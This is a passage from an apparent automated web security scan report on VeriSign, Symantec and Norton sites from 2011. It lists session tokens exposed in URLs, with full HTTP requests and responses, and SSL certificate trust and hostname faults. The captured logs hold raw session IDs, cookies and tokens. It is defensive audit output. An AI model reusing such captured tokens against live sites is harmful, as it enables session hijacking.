Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:03:49 GMT
Server: Apache
Location: http://vipmobile.verisign.com/home.v
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/ubox/image

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox3.offermatica.com/m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25

Request

GET /m2/verisign/ubox/image?mbox=time_spent&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxXDomain=disabled&mboxDefault=http%3A//www.verisign.com/stellent/groups/public/documents/image/spacer.gif&t=1315621500070&mboxPageValue=0.25 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Location: http://www.verisign.com/stellent/groups/public/documents/image/spacer.gif
Content-Length: 0
Date: Fri, 09 Sep 2011 21:24:33 GMT
Server: Test & Target

7.8. http://player.ooyala.com/sas/authorized previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://player.ooyala.com
Path:	/sas/authorized

Issue detail

The URL in the request appears to contain a session token within the query string:

http://player.ooyala.com/sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7

Request

GET /sas/authorized?analytics%5Fparams=%7B%22pcode%22%3A%22w1c2U6fqVnqafrMhiALawYi9UUck%22%7D&token=AA%2DqZeKXlu6K%2D004e6a82e2%2DpV6aaVTozOYv5jDhwDiyHvickxVNrKeSqY%2E6lHZYpEk&domain=www%2Everisign%2Ecom&embed%5Fcode%5Flist=w0NmJhMTqAVBik2%2DmvMAlw7lBOLLrNpG&timestamp=1315621597961&parent%5Fauthorized=true&signature=gKOWJocIDV592zgrbyHmOsSN4fTOnBy1%2FCAEHtU5LWI&device=WIN%2010%2C3%2C183%2C7 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Status: 200 OK
Content-Type: text/xml
Content-Length: 716
Cache-Control: public, no-cache
Date: Fri, 09 Sep 2011 21:26:08 GMT
Connection: close

iIDd0cueavrMh4p7kKVwfDcKB+ydo50WBbUtMLcgvZOMV/yRRHo/BjHe7Ytn
h3ltGU20Y0cCg8XVm0HlhUPMdTKA+JkrJ5pAHN/j9mrAIR/Jw56Ch+2AScL9
kbgM6ukGT0KwlzosaQtFwR5wEFC0kFnQVUo+wQnxNvAdBozZlJHBiYVlg2SO
JotiY/UdyOFK+TiH1
...[SNIP]...

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://renewals.symantec.com
Path:	/renewals/images/icon-pop-up.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://renewals.symantec.com/renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Request

GET /renewals/images/icon-pop-up.gif;jsessionid=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435 HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Length: 60
Content-Type: image/gif
Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT
Accept-Ranges: bytes

GIF89a . .....G....!.......,.... . ......g.....O...U...-G..;

7.10. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

7.11. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Issue detail

The URL in the request appears to contain a session token within the query string:

https://securitycenter.verisign.com/celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:17 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://symantec.tt.omtrdc.net
Path:	/m2/symantec/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39

Request

GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1591
Date: Fri, 09 Sep 2011 21:30:58 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The URL in the request appears to contain a session token within the query string:

https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001

Request

Response

7.14. http://vipmobile.verisign.com/images/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

http://vipmobile.verisign.com/images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2

Request

GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:04:01 GMT
Server: Apache
Location: http://vipmobile.verisign.com/images/favicon.ico
Content-Length: 328
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.15. https://vipmobile.verisign.com/home.v previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://vipmobile.verisign.com
Path:	/home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

https://vipmobile.verisign.com/home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1

Request

GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:52:05 GMT
Server: Apache
Location: https://vipmobile.verisign.com/home.v
Content-Length: 318
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://vipmobile.veris
...[SNIP]...

8. SSL certificate previous next
There are 37 instances of this issue:

https://fileconnect.symantec.com/
https://forms.verisign.com/
https://knowledge.verisign.ch/
https://knowledge.verisign.com/
https://onlinefamily.norton.com/
https://query.verisign.com/
https://ssl-certificate-center.verisign.ch/
https://ssl-certificate-center.verisign.com/
https://trust-center.verisign.ch/
https://trust-center.verisign.com/
https://us.norton.com/
https://admin.instantservice.com/
https://buy-static.norton.com/
https://cdn.verisign.com/
https://cert.webtrust.org/
https://donate.mozilla.org/
https://drh.img.digitalriver.com/
https://enterprise-ssl-admin.verisign.com/
https://idprotect.verisign.com/
https://partnernet.symantec.com/
https://policy3.responsys.net/
https://press.verisign.com/
https://products.geotrust.com/
https://products.verisign.com/
https://renewals.symantec.com/
https://seal.verisign.com/
https://securitycenter.verisign.com/
https://symaccount.symantec.com/
https://symantec-corporation.com/
https://test-products.verisign.com/
https://vipdeveloper.verisign.com/
https://vipmanager.verisign.com/
https://vipmobile.verisign.com/
https://vs.symantec.com/
https://www-secure.symantec.com/
https://www.verisign.com/
https://www4.symantec.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://fileconnect.symantec.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	FILECONNECT.SYMANTEC.COM
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:	Sat Jul 07 17:59:59 GMT-06:00 2012

8.2. https://forms.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://forms.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificate:

Issued to:	forms.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun May 29 18:00:00 GMT-06:00 2011
Valid to:	Wed May 29 17:59:59 GMT-06:00 2013

8.3. https://knowledge.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	vrsn-intl.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Jun 08 18:00:00 GMT-06:00 2010
Valid to:	Fri Jun 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.4. https://knowledge.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	knowledge.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Feb 02 18:00:00 GMT-06:00 2010
Valid to:	Mon Feb 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.5. https://onlinefamily.norton.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	www.onlinefamily.norton.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Oct 05 18:00:00 GMT-06:00 2010
Valid to:	Thu Oct 06 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:	Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.6. https://query.verisign.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/

Issue detail

The following problems were identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.
The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	query-ncsa.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Feb 13 18:00:00 GMT-06:00 2011
Valid to:	Tue Mar 05 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://ssl-certificate-center.verisign.ch/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not valid for the server's hostname.

The server presented the following certificates:

Server certificate

Issued to:	ssl-certificate-center-emea.verisign.net
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
